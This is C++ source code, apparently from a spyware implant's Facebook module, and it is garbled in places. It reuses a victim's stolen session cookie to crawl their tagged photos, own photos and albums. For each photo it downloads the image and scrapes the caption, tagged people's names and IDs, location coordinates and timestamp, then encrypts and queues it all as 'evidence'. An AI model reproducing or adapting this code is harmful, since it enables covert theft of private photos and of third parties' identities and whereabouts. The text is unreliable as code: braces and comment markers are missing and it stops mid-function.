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#include <Windows.h>
#include <WinInet.h>
#include <string>

#include "photo.h"
#include "cookies.h"
#include "conf.h"
#include "facebook.h"
#include "globals.h"
#include "JSON.h"
#include "JSONValue.h"
#include "proto.h"
#include "social.h"
#include "utils.h"
#include "uthash.h"
#include "zmem.h"

#include "photo_facebook.h"

#ifdef _DEBUG
#include "debug.h"

#define URL_SIZE_IN_CHARS    2048

/* facebook defines  */
#define FBID_TAG             "data-fbid=\""
#define FBID_TOKEN             "\"token\":\""
#define FBID_PHOTO_URL         "id=\"fbPhotoImage\" src=\"https://"
#define FBID_PHOTO_CAPTION   "<span class=\"hasCaption\">"
#define FBID_PHOTO_TAG_LIST     "<span class=\"fbPhotoTagList\" id=\"fbPhotoPageTagList\">"
#define FBID_PHOTO_TAG_ITEM  "<span class=\"fbPhotoTagListTag tagItem\">"
#define FBID_PHOTO_LOCATION  "<span class=\"fbPhotoTagListTag withTagItem tagItem\">"
#define FBID_PHOTO_TIMESTAMP "fbPhotoPageTimestamp"

typedef struct _facebook_photo_id {
    UINT64    fbid;            // key
#define PHOTOS_YOURS    0
#define PHOTOS_OF_YOU    1
#define PHOTOS_ALBUM    2  // hack for shared album fbid order problem
    DWORD   dwType;            
    UT_hash_handle hh;        // handle
} facebook_photo_id;

typedef struct _facebook_placeId_to_location {
    UINT64 placeId;   // key
    FLOAT  latitude;
    FLOAT  longitude;
    UT_hash_handle hh;
} facebook_placeId_to_location;

/* start of string utils*/
bool replace(std::string& str, const std::string& from, const std::string& to) {
    size_t start_pos = str.find(from);
    if(start_pos == std::string::npos)
        return false;
    str.replace(start_pos, from.length(), to);
    return true;

void replaceAll(std::string& str, const std::string& from, const std::string& to) {
    size_t start_pos = 0;
    while((start_pos = str.find(from, start_pos)) != std::string::npos) {
        str.replace(start_pos, from.length(), to);
        start_pos += to.length(); 
/* end of string utils */

/* start of facebook photo handling functions */

    Description:    extracts the photo blob from a Facebook photo specific page
    Params:            Facebook cookie, photo specific page, returned size of the blog, returned path (URL) of the blob
    Usage:            returns null or a buffer containing the image that must be freed by the caller, strPhotoBlobPath must be freed by the caller if not null. 
                    Input page is modified temporary.
LPBYTE FacebookPhotoExtractPhotoBlob(__in LPSTR strCookie, __in LPSTR strHtmlPage, __out PULONG uSize, __out LPSTR *strPhotoBlobPath)
        - strUrl is allocated and free'd accordingly
        - strRecvPhoto is allocated and returned to the caller if not NULL
        - strPhotoBlobPath is allocated and returned to the caller if not NULL
    LPSTR strParser1, strParser2;
    CHAR chTmp;

    /*    photo url follows id="fbPhotoImage": 
            <img class="fbPhotoImage img" id="fbPhotoImage" src="https://scontent-b.xx.fbcdn.net/hphotos-xpf1/v/t1.0-9/10409298_1588556341373553_8673446508125364435_n.jpg?oh=122bdc630c330a300e034afee9ead8a0&amp;oe=55290EDD" alt="">  
    strParser1 = strstr(strHtmlPage, FBID_PHOTO_URL);
    if (!strParser1)
        return NULL;

    strParser1 += strlen(FBID_PHOTO_URL);

    strParser2 = strstr(strParser1, "\"");
    if (!strParser2)
        return NULL;

    /* temporary change input page */
    chTmp = *strParser2;
    *strParser2 = NULL;

    /* poor man html unescape, replace the ampersand in the url: &amp; -> & */
    std::string tmp(strParser1);
    replaceAll(tmp, "&amp;", "&");
    LPCSTR szUnescapedUrl = tmp.c_str();

    LPWSTR strUrl = (LPWSTR) zalloc_s(URL_SIZE_IN_CHARS  * sizeof(WCHAR));
    if (!strUrl)
        return NULL;

    /* save the complete url, break it down for request next */
    _snwprintf_s(strUrl, URL_SIZE_IN_CHARS, _TRUNCATE, L"%S", szUnescapedUrl );

    /* restore input page */
    *strParser2 = chTmp;

#ifdef _DEBUG
    OutputDebug(L"[*] %S - photo url: %s\n", __FUNCTION__, strUrl);

    /* copy url into the out parameter*/
    *strPhotoBlobPath = (LPSTR) zalloc_s(strlen(szUnescapedUrl) + 1);
    if (*strPhotoBlobPath)
        strncpy_s(*strPhotoBlobPath, strlen(szUnescapedUrl) + 1, szUnescapedUrl, _TRUNCATE);
    /*    strUrl is "scontent-b.xx.fbcdn.net/hphotos-xpf...."
        null-out the first '/' and obtain domain-NULL-relative 
        strUrl will hold the domain
        strUrlRelative will hold the relative part, WinHTTP can handle the missing '/'
    LPWSTR strUrlRelative = StrStrW(strUrl, L".net");
    if (!strUrlRelative)
        return NULL;

    strUrlRelative += wcslen(L".net");
    *strUrlRelative = NULL;
    strUrlRelative +=1;

    LPBYTE strRecvPhoto = NULL;
    DWORD dwBuffSize = 0;
    DWORD dwRet = HttpSocialRequest(strUrl, L"GET", strUrlRelative, 443, NULL, 0, &strRecvPhoto, &dwBuffSize, strCookie);
    *uSize = dwBuffSize;
#ifdef _DEBUG
    if (strRecvPhoto)
        HexDump(L"[*] Facebook Photo header", strRecvPhoto, 48);

    if (strRecvPhoto)
        return strRecvPhoto;
        return NULL;

    Description:    extracts the caption from a Facebook photo specific page
    Params:            Facebook photo specific page
    Usage:            returns null or a string containing the caption, which must be freed by the caller. Input page is modified temporary.
LPSTR FacebookPhotoExtractPhotoCaption(LPSTR strHtmlPage)
            - strCaption is allocated and returned to the caller if not NULL


    LPSTR strParser1, strParser2;
    CHAR chTmp;
    LPSTR strCaption = NULL;

    /*  caption, if any, follows span class="hasCaption": 
            <span class="hasCaption"> <br>very serious</span> 

    strParser1 = strstr(strHtmlPage, FBID_PHOTO_CAPTION);
    if (strParser1)
        strParser1 += strlen(FBID_PHOTO_CAPTION);
        strParser1 = strstr(strParser1, ">"); // skip <br>
        if (!strParser1)
            return NULL;

        strParser1 +=1;

        strParser2 = strstr(strParser1, "</");

        if (strParser2)

            /* temporary change input page */
            chTmp = *strParser2;
            *strParser2 = NULL;

#ifdef _DEBUG
            OutputDebug(L"[*] %S - caption: %S %d\n", __FUNCTION__, strParser1, strlen(strParser1));

            size_t length = strlen(strParser1) + 1;
            strCaption = (LPSTR) zalloc_s(length);
            if (!strCaption)
                return NULL;

            std::string tmp(strParser1);
            replaceAll(tmp, "\"", "\\\"");
            LPCSTR szUnescapedUrl = tmp.c_str();

            strncpy_s(strCaption, length, szUnescapedUrl, _TRUNCATE);

            /* restore input page */
            *strParser2 = chTmp;


    return strCaption;

    Description:    extracts tags from a Facebook photo specific page
    Params:            Facebook photo specific page
    Usage:            returns null or a buffer containing a list of tags, which must be freed by the caller. Input page is modified temporary.
                    Array of tags has the format 'name, facebook_id;..', when facebook_id is not available it's set to null:
                    - johnny,12341234;begoode,null;unknown,null     

                    - Facebook names/handles can't contain ',' or ';'
LPSTR FacebookPhotoExtractPhotoTags(LPSTR strHtmlPage)
            - strTags is reallocated within a loop and returned to the caller if not NULL

    LPSTR strParser1, strParser2, strParserInner1, strParserInner2;
    CHAR chTmp, chTmpInner;
    LPSTR strTags = NULL;

    /*  other people tag:

            everything will be within <span class="fbPhotoTagList" id="fbPhotoPageTagList">..</span>:
            - not registered in Facebook
                <span class="fbPhotoTagListTag tagItem"><input type="hidden" autocomplete="off" name="tag[]" value="1588556671373520"><a class="textTagHovercardLink taggee" data-tag="1588556671373520" data-hovercard="/ajax/hovercard/hovercard.php?id=1588556671373520&amp;type=mediatag&amp;media_info=0.1588556341373553" aria-owns="js_e" aria-haspopup="true" id="js_f">Bloody Abu Dhabi</a></span>
            - registered in Facebook
                <span class="fbPhotoTagListTag tagItem"><input type="hidden" autocomplete="off" name="tag[]" value="100003663718866"><a class="taggee" href="https://www.facebook.com/antroide.succhienmberg" data-tag="100003663718866" data-hovercard="/ajax/hovercard/hovercard.php?id=100003663718866&amp;type=mediatag&amp;media_info=0.1588556338040220" aria-owns="js_9" aria-haspopup="true" id="js_a">Antroide Succhienmberg</a></span>
    strParser1 = strstr(strHtmlPage, FBID_PHOTO_TAG_LIST);
    if (strParser1)
        /* loop through the tag list */
        while (TRUE)
            strParser1 = strstr(strParser1, FBID_PHOTO_TAG_ITEM);
            if (!strParser1) // if we can't find a tag item, bail 

            strParser1 += strlen(FBID_PHOTO_TAG_ITEM);

            strParser2 = strstr(strParser1, "</span>");

            if (!strParser2) 

            /* temporary change input page */
            chTmp = *strParser2;
            *strParser2 = NULL;

            /* advance strParser1 skipping <input ...>, can skip the return value check */
            strParser1 = strstr(strParser1, ">") + 1;  

#ifdef _DEBUG
            OutputDebug(L"[*] %S - tag item: %S\n", __FUNCTION__, strParser1);

            /* a] fetch taggee facebook id if available, 'null' otherwise */
            CHAR strFacebookId[256] = {'n', 'u', 'l', 'l', 0};

            if (strstr(strParser1, "class=\"taggee\""))
            {        /* registered user fetch the id */
                     strParserInner1 = strstr(strParser1, "data-tag=\"");
                     strParserInner1 += strlen("data-tag=\"");

                     if (strParserInner1)
                         strParserInner2 = strstr(strParserInner1, "\"");

                         /* temporary change input page */
                         chTmpInner = *strParserInner2;
                         *strParserInner2 = NULL;

                         strncpy_s(strFacebookId, 256, strParserInner1, _TRUNCATE);

                         /* restore input page */
                         *strParserInner2 = chTmpInner;

            /* b] fetch taggee name */
            CHAR strTaggeeName[512] = {'u', 'n', 'k', 'n', 'o', 'w', 'n', 0}; 

            strParserInner1 = strstr(strParser1, ">");
            if (strParserInner1)
                strParserInner1 +=1;

                strParserInner2 = strstr(strParserInner1, "<");

                /* temporary change input page */
                 chTmpInner = *strParserInner2;
                 *strParserInner2 = NULL;

                 strncpy_s(strTaggeeName, 512, strParserInner1, _TRUNCATE);

                 /* restore input page */
                 *strParserInner2 = chTmpInner;


#ifdef _DEBUG
            OutputDebug(L"[*] %S - taggee -> %S id -> %S\n", __FUNCTION__, strTaggeeName, strFacebookId);

            /* restore input page */
            *strParser2 = chTmp;

            /* prepare for next loop */
            strParser1 = strParser2;

            /* save new record */
            size_t tags_size = 0, old_tags_size = 0;
            // determine new buffer size and increase allocated space accordingly
            if (strTags)
                old_tags_size += strlen(strTags);

            tags_size = old_tags_size + strlen(strTaggeeName) + strlen(strFacebookId) + 3; // 3 = comma + semicolon + NULL
            strTags = (LPSTR) realloc(strTags, tags_size); 

            // if allocation failed return either what has been allocated so far or NULL
            if (!strTags)
                return strTags;

            // initialize to 0 before first record strcat_s
            if (!old_tags_size)
                SecureZeroMemory(strTags, tags_size);

            // append strings
            strcat_s(strTags, tags_size, strTaggeeName);
            strcat_s(strTags, tags_size, ",");
            strcat_s(strTags, tags_size, strFacebookId);
            strcat_s(strTags, tags_size, ";");

#ifdef _DEBUG
            OutputDebug(L"[*] %S - record updated: %S\n", __FUNCTION__, strTags);

    return strTags;

    Description:    extracts the location from a Facebook photo specific page
    Params:            Facebook cookie, Facebook photo specific page
    Usage:            returns null or a string containing the location, which must be freed by the caller. Input page is modified temporary.

                    location format is latitude,longitude:
LPSTR FacebookPhotoExtractPhotoLocation(__in LPSTR strCookie, __in LPSTR strHtmlPage, facebook_placeId_to_location *idToLocation_hash_head)
            - a page is fetched and free'd
            - strLocation is allocated and returned to the caller if not NULL

    LPSTR strParser1, strParser2;
    CHAR chTmp;
    LPSTR strLocation = NULL;

    /*    location:
            a]    find
                <span class="fbPhotoTagListTag withTagItem tagItem"><input type="hidden" autocomplete="off" name="tag[]" value="231160113588411"><a class="taggee" href="https://www.facebook.com/pages/Nurburgring-Nordschleife/231160113588411?ref=stream" data-hovercard="/ajax/hovercard/page.php?id=231160113588411" aria-owns="js_9" aria-haspopup="true" id="js_a">Nurburgring Nordschleife</a></span>
            b]    value s.a. 231160113588411 is the placeId and key idToLocation_hash_head

    strParser1 = strstr(strHtmlPage, FBID_PHOTO_LOCATION);
    if (strParser1)
        /* a] */
        strParser1 += strlen(FBID_PHOTO_LOCATION);
        strParser1 = strstr(strParser1, "value=\"");
        if (!strParser1)
            return NULL;
        strParser1 += strlen("value=\"");
        strParser2 = strstr(strParser1, "\"");
        if (!strParser2)
            return NULL;
        /* temporary change input page */
        chTmp = *strParser2;
        *strParser2 = NULL;

#ifdef _DEBUG
        OutputDebug(L"[*] %S - place id : %S\n", __FUNCTION__, strParser1);
        UINT64 thisPlaceId = _strtoui64(strParser1, NULL, 10);
        if (!thisPlaceId)
            return NULL;

        facebook_placeId_to_location *findMe = NULL;
        HASH_FIND(hh, idToLocation_hash_head, &thisPlaceId, sizeof(UINT64), findMe);

        if (findMe == NULL)
            return NULL;

        /* prepare full string */
        strLocation = (LPSTR) zalloc_s(64); 
        if (strLocation)
            _snprintf_s(strLocation, 64, _TRUNCATE, "%f,%f", findMe->latitude, findMe->longitude );

#ifdef _DEBUG
        OutputDebug(L"[*] %S - coordinates id : %f - %f\n", __FUNCTION__, findMe->latitude, findMe->longitude);

        /* restore input page */
        *strParser2 = chTmp;


    return strLocation;

    Description:    extracts the epoch timestamp  from a Facebook photo specific page
    Params:            Facebook photo specific page
    Usage:            returns null or a string containing the epoch timestamp, which must be freed by the caller. Input page is modified temporary.
LPSTR FacebookPhotoExtractTimestamp(__in LPSTR strHtmlPage)
    /* allocations:
        - strTimestamp is allocated and returned to the caller

    LPSTR strParser1, strParser2;
    CHAR chTmp;
    LPSTR strTimestamp = NULL;

    strParser1 = strstr(strHtmlPage, FBID_PHOTO_TIMESTAMP);
    if (!strParser1)
        return NULL;
    strParser1 += strlen(FBID_PHOTO_TIMESTAMP);
    strParser1 = strstr(strParser1, "data-utime=\"");
    if (!strParser1)
        return NULL;

    strParser1 += strlen("data-utime=\"");

    strParser2 = strstr(strParser1, "\"");
    if (!strParser2)
        return NULL;

    /* temporary change input page */
    chTmp = *strParser2;
    *strParser2 = NULL;

#ifdef _DEBUG
    OutputDebug(L"[*] %S - timestamp url: %S\n", __FUNCTION__, strParser1);

    size_t timestampLength = strlen(strParser1) + 1;
    strTimestamp = (LPSTR) zalloc_s(timestampLength);
    if (!strTimestamp)
        return NULL;

    strncpy_s(strTimestamp, timestampLength, strParser1, _TRUNCATE);

    /* restore input page */
    *strParser2 = chTmp;

    return strTimestamp;

    Description:    append to strAppendMe a snprintf' of strFormat and strConsumed
    Params:            string to be appended, format string with a %s (e.g. \"description\": \"%s\", ";), string sprintf'd into the format string
    Usage:            changes strAppendMe, by reallocating  and appending.

VOID FacebookPhotoLogJsonAppend(LPSTR* strAppendMe, __in LPCSTR strFormat, __in LPSTR strConsumed)
    /*    allocations:
        - strTemp is allocated and free'd
        - strAppendMe is reallocated        

    if (!*strAppendMe  || !strFormat || !strConsumed)

    size_t strJsonLogSize = 0;
    LPSTR strTemp = NULL;
    size_t tempSize = strlen(strConsumed) + strlen(strFormat) -2 + 1; // -2: %s , +1: null
    strTemp = (LPSTR) zalloc_s(tempSize);
    if (strTemp)
        _snprintf_s(strTemp, tempSize, _TRUNCATE, strFormat, strConsumed);

        strJsonLogSize = strlen(strTemp) + strlen(*strAppendMe) + 1;
        *strAppendMe = (LPSTR) realloc(*strAppendMe, strJsonLogSize);

        if (*strAppendMe)
            strncat_s(*strAppendMe, strJsonLogSize, strTemp, _TRUNCATE);


    Description:    prepare and queue a complete photo log (blob + metadata) for a single fbid
    Params:            photo blob, its size, caption, tags, location, path, timestamp
    Usage:            -
VOID FacebookPhotoLog(__in LPBYTE lpPhotoBlob, __in ULONG uSize, __in LPSTR strCaption, __in LPSTR strTags, __in LPSTR strLocation, __in LPSTR strPhotoPath, __in LPSTR strTimestamp)
    /* allocations:
        - strJsonLog contain the full json log and before queuing the evidence the null termination is removed, beware
    LPSTR strJsonLog = NULL;
    size_t strJsonLogSize = 0;

    // photo blob is mandatory
    if (!lpPhotoBlob)

    // program
    LPCSTR strProgramJson = "{ \"program\": \"Facebook\", \"device\": \"Desktop\", ";
    size_t programSize = strlen(strProgramJson) + 1;
    strJsonLog = (LPSTR) zalloc_s(programSize);
    if (strJsonLog)
        strncpy_s(strJsonLog, programSize, strProgramJson, _TRUNCATE);
    // path
    if (strPhotoPath)
        LPCSTR strCaptionTemplate = "\"path\": \"%s\", ";
        FacebookPhotoLogJsonAppend(&strJsonLog, strCaptionTemplate, strPhotoPath);

    // caption
    if (strCaption)
        LPCSTR strCaptionTemplate = "\"description\": \"%s\", ";
        FacebookPhotoLogJsonAppend(&strJsonLog, strCaptionTemplate, strCaption);

    // tags
    if (strTags)
        // "convert johnny,12341234;begoode,null;" to [{"name":"johnny", "handle":"12341234"},{"name":"begoode"}]
        LPSTR strContext = NULL;
        LPSTR strRecord = strtok_s(strTags, ";", &strContext);
        size_t strTagJsonSize = 0;

        LPSTR strTagJson = (LPSTR) zalloc_s(4);

        if (strTagJson)
            _snprintf_s(strTagJson, 4, _TRUNCATE, "[");

            while (strRecord != NULL)

                LPSTR strHandle = strstr(strRecord, ",");
                if (strHandle) // verify handle is kosher
                    *strHandle = NULL;
                    strHandle +=1;

                    // strRecord points to taggee name, strHandle to its handle, if any
                    LPCSTR strTaggeeTemplate = "{\"name\": \"%s\"";
                    FacebookPhotoLogJsonAppend(&strTagJson, strTaggeeTemplate, strRecord);

                    if ( strcmp(strHandle, "null") )
                        // we've a handle
                        LPCSTR strHandleTemplate = ", \"handle\": \"%s\", \"type\": \"facebook\"";
                        FacebookPhotoLogJsonAppend(&strTagJson, strHandleTemplate, strHandle);

                    // close the record with "},"
                    strTagJsonSize = strlen(strTagJson) + 1 + 2; // null + },
                    strTagJson = (LPSTR) realloc(strTagJson, strTagJsonSize);
                    if (strTagJson)
                        strncat_s(strTagJson, strTagJsonSize, "},", _TRUNCATE);
                strRecord = strtok_s(NULL, ";", &strContext);

            // overwrite last "," and close the record with "],"
            LPSTR strComma = strrchr(strTagJson, ',');
            if (strComma)
                *strComma = ' ';

            // prepare the final json 
            LPCSTR strTagsTemplate = "\"tags\": %s], ";
            FacebookPhotoLogJsonAppend(&strJsonLog, strTagsTemplate, strTagJson);


    // location
    if (strLocation)
        // convert "45.0,-9.1" to {"lat": 45.0, "lon": 9.1, "r": 50}
        LPSTR strLongitude = strstr(strLocation, ",");
        LPSTR strLocationJson = NULL;
        if (strLongitude)
            strLocationJson = (LPSTR) zalloc_s(4);
            if (strLocationJson)
                _snprintf_s(strLocationJson, 4, _TRUNCATE, "{");
                *strLongitude = NULL;
                strLongitude +=1;

                // strLocation points to lat value, strLongitude points to lon value
                FacebookPhotoLogJsonAppend(&strLocationJson, "\"lat\": %s, ", strLocation);

                FacebookPhotoLogJsonAppend(&strLocationJson, "\"lon\": %s, \"r\": 50}", strLongitude);

                LPCSTR strLocationTemplate = "\"place\": %s, ";
                FacebookPhotoLogJsonAppend(&strJsonLog, strLocationTemplate, strLocationJson);


    // timestamp
    if (strTimestamp)
        LPCSTR strTimestampTemplate = "\"time\": %s, ";
        FacebookPhotoLogJsonAppend(&strJsonLog, strTimestampTemplate, strTimestamp);

    // close json

#ifdef _DEBUG
    OutputDebug(L"[*] %S - json log: %S\n", __FUNCTION__, strJsonLog);

    strJsonLogSize = strlen(strJsonLog);
    CHAR* strReplace = strrchr(strJsonLog, ',');
    if (strReplace)
        // N.B.: from now on strJsonLog is not NULL terminated anymore
        // length is 3 because we're replacing ", " + NULL, which terminates every partial json string 
        CHAR a[] = { '}', ' ', ' ' };  
        memcpy_s(strReplace, 3, &a, 3);

    size_t additionalHeaderSize = sizeof(PHOTO_ADDITIONAL_HEADER) + strJsonLogSize;
    LPPHOTO_ADDITIONAL_HEADER lpPhotoAdditionalHeader = (LPPHOTO_ADDITIONAL_HEADER) zalloc_s(additionalHeaderSize);

    lpPhotoAdditionalHeader->uVersion = LOG_PHOTO_VERSION;
    memcpy_s(lpPhotoAdditionalHeader->strJsonLog, strJsonLogSize, strJsonLog, strJsonLogSize);

    DWORD dwEvSize;
    LPBYTE lpEvBuffer = PackEncryptEvidence(uSize, lpPhotoBlob, PM_PHOTO, (LPBYTE) lpPhotoAdditionalHeader, additionalHeaderSize, &dwEvSize);

    /* queue the evidence */
    if (!QueuePhotoLog(lpEvBuffer, dwEvSize))

    /* cleanup */


    Description:    fetches Facebook photo blob and its metadata and then queues the evidence 
    Params:            valid Facebook cookie, struct for fbid
    Usage:            -
VOID FacebookPhotoHandleSinglePhoto(__in LPSTR strCookie,  facebook_photo_id *fbid, facebook_placeId_to_location *idToLocation_hash_head)

        a] fetch page:
            url format:

    LPWSTR strUrl = (LPWSTR) zalloc_s(URL_SIZE_IN_CHARS  * sizeof(WCHAR));
    if (!strUrl)

    _snwprintf_s(strUrl, URL_SIZE_IN_CHARS , _TRUNCATE, L"/photo.php?fbid=%I64d",  fbid->fbid);
    LPSTR strRecvBuffer = NULL;
    DWORD dwBuffSize;
    DWORD dwRet = HttpSocialRequest(L"www.facebook.com", L"GET", strUrl, 443, NULL, 0, (LPBYTE *)&strRecvBuffer, &dwBuffSize, strCookie);


    /* strip hidden_elem */
    std::string tmpSanitize(strRecvBuffer);
    replaceAll(tmpSanitize, " hidden_elem", "");
    replaceAll(tmpSanitize, "hidden_elem ", "");
    replaceAll(tmpSanitize, " hidden_elem ", "");
    LPSTR facebookPhotoPageSanitized = _strdup(tmpSanitize.c_str());

    if( facebookPhotoPageSanitized == NULL)

    /*    b] mandatory - retrieve the photo blob and its path */ 
    ULONG uSize = 0;
    LPSTR strPhotoBlobPath = NULL;
    LPBYTE strRecvPhoto = FacebookPhotoExtractPhotoBlob(strCookie, facebookPhotoPageSanitized, &uSize, &strPhotoBlobPath);

    /*  c] optional - caption    */ 
    LPSTR strCaption = FacebookPhotoExtractPhotoCaption(facebookPhotoPageSanitized);

    /*  d] optional - other people tag    */
    LPSTR strTags = FacebookPhotoExtractPhotoTags(facebookPhotoPageSanitized);
    /*    e] optional - location */
    LPSTR strLocation = FacebookPhotoExtractPhotoLocation(strCookie, facebookPhotoPageSanitized, idToLocation_hash_head);

    /*  f] optional - timestamp */
    LPSTR strEpochTimestamp = FacebookPhotoExtractTimestamp(facebookPhotoPageSanitized);

    /* log all the things */
    FacebookPhotoLog(strRecvPhoto, uSize, strCaption, strTags, strLocation, strPhotoBlobPath, strEpochTimestamp);

    /* cleanup */
    if (strRecvPhoto)

    if (strPhotoBlobPath)

    if (strCaption)

    if (strTags)

    if (strLocation)

    if (strEpochTimestamp)

    Description:    parse StrContainingFbids and inserts fbids found into hash_head
    Params:            string containg fbids, pointer to hash head, type of fbid
    Usage:            new fbids are allocated and inserted into hash_head, StrContainingFbids temporarily changed 
VOID FacebookPhotoExtractFbidsFromPage(__in LPSTR StrContainingFbids, facebook_photo_id **hash_head, DWORD dwFbidType)
    LPSTR strPhotoParser1, strPhotoParser2;
    CHAR strFbid[32]; 

    strPhotoParser1 = StrContainingFbids;
    while (TRUE)
        strPhotoParser1 = strstr(strPhotoParser1, FBID_TAG);
        if (!strPhotoParser1)

        strPhotoParser1 += strlen(FBID_TAG);

        strPhotoParser2 = strstr(strPhotoParser1, "\"");
        if (!strPhotoParser2)

        *strPhotoParser2 = NULL;
        _snprintf_s(strFbid, sizeof(strFbid), "%s", strPhotoParser1);
        strPhotoParser1 = strPhotoParser2 + 1;

        facebook_photo_id *fbid_new = (facebook_photo_id*) zalloc_s(sizeof(facebook_photo_id));
        fbid_new->fbid = _strtoui64(strFbid, NULL, 10);
        fbid_new->dwType = dwFbidType;

#ifdef _DEBUG
        OutputDebug(L"[*] %S - fbid: %I64d count: %d\n",  __FUNCTION__, fbid_new->fbid, HASH_COUNT(*hash_head));

        facebook_photo_id *fbid_tmp = NULL;
        HASH_FIND(hh, *hash_head, &fbid_new->fbid, sizeof(UINT64), fbid_tmp);

        if (fbid_tmp == NULL) {
            HASH_ADD(hh, *hash_head, fbid, sizeof(UINT64), fbid_new);
        } else {


    Description:    crawls from strPageContainingToken and inserts fbids found into hash_head
    Params:            valid Facebook cookie, Facebook user id, page containing TaggedPhotosAppCollectionPagelet token, pointer to hash head
    Usage:            new fbids are allocated and inserted into hash_head, strPageContainingToken temporarily changed 
VOID FacebookPhotoCrawlPhotosOfYou(__in LPSTR strCookie, __in LPSTR strUserId, __in LPSTR strPageContainingToken, facebook_photo_id **hash_head)
    LPSTR strParser1, strParser2;
    CHAR chTmp;

    /*  Photos of You, e.g.:
        "controller": "TaggedPhotosAppCollectionPagelet"
        "token": "100006576075695:2305272732:4", // using token 
        "href": "https:\/\/www.facebook.com\/profile.php?id=100006576075695&sk=photos&collection_token=100006576075695\u00253A2305272732\u00253A4", // ignore href, don't want to json unescape 

    /* a] fetch page with fbids */
    strParser1 = strstr(strPageContainingToken, "\"TaggedPhotosAppCollectionPagelet\"");
    if (!strParser1)

    strParser1 = strstr(strParser1, FBID_TOKEN);

    if (!strParser1)

    strParser1 += strlen(FBID_TOKEN);

    strParser2 = strstr(strParser1, "\",");
    if (!strParser2)
    /* temporary change input page */
    chTmp = *strParser2;
    *strParser2 = NULL;
    LPWSTR strUrlPhotos = (LPWSTR) zalloc_s(URL_SIZE_IN_CHARS * sizeof(WCHAR));
    if (!strUrlPhotos)

    _snwprintf_s(strUrlPhotos, URL_SIZE_IN_CHARS, _TRUNCATE, L"/profile.php?id=%S&sk=photos&collection_token=%S", strUserId, strParser1);

    /* restore input page */
    *strParser2 = chTmp;

#ifdef _DEBUG
    OutputDebug(L"[*] %S - photos of you: %s\n", __FUNCTION__, strUrlPhotos);

    LPSTR strRecvPhotoBuffer = NULL;
    DWORD dwBuffSize = 0;
    DWORD dwRet = HttpSocialRequest(L"www.facebook.com", L"GET", strUrlPhotos, 443, NULL, 0, (LPBYTE *)&strRecvPhotoBuffer, &dwBuffSize, strCookie);


    /*    b] collect fbids 
        e.g. data-fbid="1588556341373553">

    FacebookPhotoExtractFbidsFromPage(strRecvPhotoBuffer, hash_head, PHOTOS_OF_YOU);
    /* cleanup */

    Description:    crawls from strPageContainingToken and inserts fbids found into hash_head
    Params:            valid Facebook cookie, Facebook user id, page containing AllPhotosAppCollectionPagelet token, pointer to hash head
    Usage:            new fbids are allocated and inserted into hash_head, strPageContainingToken temporarily changed

VOID FacebookPhotoCrawlYourPhotos(__in LPSTR strCookie, __in LPSTR strUserId, __in LPSTR strPageContainingToken, facebook_photo_id **hash_head)
    LPSTR strParser1, strParser2;
    CHAR chTmp;

    /*  2] Your Photos, e.g.:
        "controller": "AllPhotosAppCollectionPagelet"

    /* 2a] fetch page with fbids */
    strParser1 = strstr(strPageContainingToken, "\"AllPhotosAppCollectionPagelet\"");
    if (!strParser1)

    strParser1 = strstr(strParser1, FBID_TOKEN);

    if (!strParser1)

    strParser1 += strlen(FBID_TOKEN);

    strParser2 = strstr(strParser1, "\",");
    if (!strParser2)

    /* temporary change input page */
    chTmp = *strParser2;
    *strParser2 = NULL;
    LPWSTR strUrlPhotos = (LPWSTR) zalloc_s(URL_SIZE_IN_CHARS * sizeof(WCHAR));
    if (!strUrlPhotos)

    _snwprintf_s(strUrlPhotos, URL_SIZE_IN_CHARS, _TRUNCATE, L"/profile.php?id=%S&sk=photos&collection_token=%S", strUserId, strParser1);

    /* restore input page */
    *strParser2 = chTmp;

#ifdef _DEBUG
    OutputDebug(L"[*] %S - your photos: %s\n", __FUNCTION__, strUrlPhotos);

    LPSTR strRecvPhotoBuffer = NULL;
    DWORD dwBuffSize = 0;
    DWORD dwRet = HttpSocialRequest(L"www.facebook.com", L"GET", strUrlPhotos, 443, NULL, 0, (LPBYTE *)&strRecvPhotoBuffer, &dwBuffSize, strCookie);


    /* 2b] collect fbids 
        e.g. data-fbid="1588556341373553">

    FacebookPhotoExtractFbidsFromPage(strRecvPhotoBuffer, hash_head, PHOTOS_YOURS);

    Description:    crawls from strPageContainingToken and inserts fbids found into hash_head
    Params:            valid Facebook cookie, Facebook user id, page containing PhotoAlbumsAppCollectionPagelet and SinglePhotoAlbumAppCollectionPagelet tokens, pointer to hash head
    Usage:            new fbids are allocated and inserted into hash_head, strPageContainingToken temporarily changed

VOID FacebookPhotoCrawlAlbums(__in LPSTR strCookie, __in LPSTR strUserId, __in LPSTR strPageContainingToken, facebook_photo_id **hash_head)
    /* allocations:
        - while looping through the albums, an http request is done for each album. The buffer containing such pages
          is allocated and free'd each time.

        a] "controller": "PhotoAlbumsAppCollectionPagelet" contains the token needed to fetch the albums

        b] "controller": "SinglePhotoAlbumAppCollectionPagelet" contains the token needed to later fetch the photo within the albums 

    LPSTR strParser1, strParser2;
    CHAR chTmp;

    /* a] fetch page containing albums links "albumThumbLink" */
    strParser1 = strstr(strPageContainingToken, "\"PhotoAlbumsAppCollectionPagelet\"");
    if (!strParser1)
    strParser1 = strstr(strParser1, FBID_TOKEN);

    if (!strParser1)

    strParser1 += strlen(FBID_TOKEN);

    strParser2 = strstr(strParser1, "\",");
    if (!strParser2)
    /* temporary change strPageContainingToken */
    chTmp = *strParser2;
    *strParser2 = NULL;
    LPWSTR strUrlAlbums = (LPWSTR) zalloc_s(URL_SIZE_IN_CHARS * sizeof(WCHAR));
    if (!strUrlAlbums)

    _snwprintf_s(strUrlAlbums, URL_SIZE_IN_CHARS, _TRUNCATE, L"/profile.php?id=%S&sk=photos&collection_token=%S", strUserId, strParser1);

    /* restore strPageContainingToken */
    *strParser2 = chTmp;

#ifdef _DEBUG
    OutputDebug(L"[*] %S - albums url: %s\n", __FUNCTION__, strUrlAlbums);

    DWORD dwBuffSize = 0;
    LPSTR strRecvAlbumsBuffer = NULL;
    DWORD dwRet = HttpSocialRequest(L"www.facebook.com", L"GET", strUrlAlbums, 443, NULL, 0, (LPBYTE *)&strRecvAlbumsBuffer, &dwBuffSize, strCookie);
    /* reusing later in album fetch loop b] */
    SecureZeroMemory(strUrlAlbums, URL_SIZE_IN_CHARS * sizeof(WCHAR) );


    /* b] find token "SinglePhotoAlbumAppCollectionPagelet", which is needed in stage c] */
    strParser1 = strstr(strPageContainingToken, "\"SinglePhotoAlbumAppCollectionPagelet\"");
    if (!strParser1)
    strParser1 = strstr(strParser1, FBID_TOKEN);

    if (!strParser1)

    strParser1 += strlen(FBID_TOKEN);

    strParser2 = strstr(strParser1, "\",");
    if (!strParser2)
    /* temporary change strPageContainingToken */
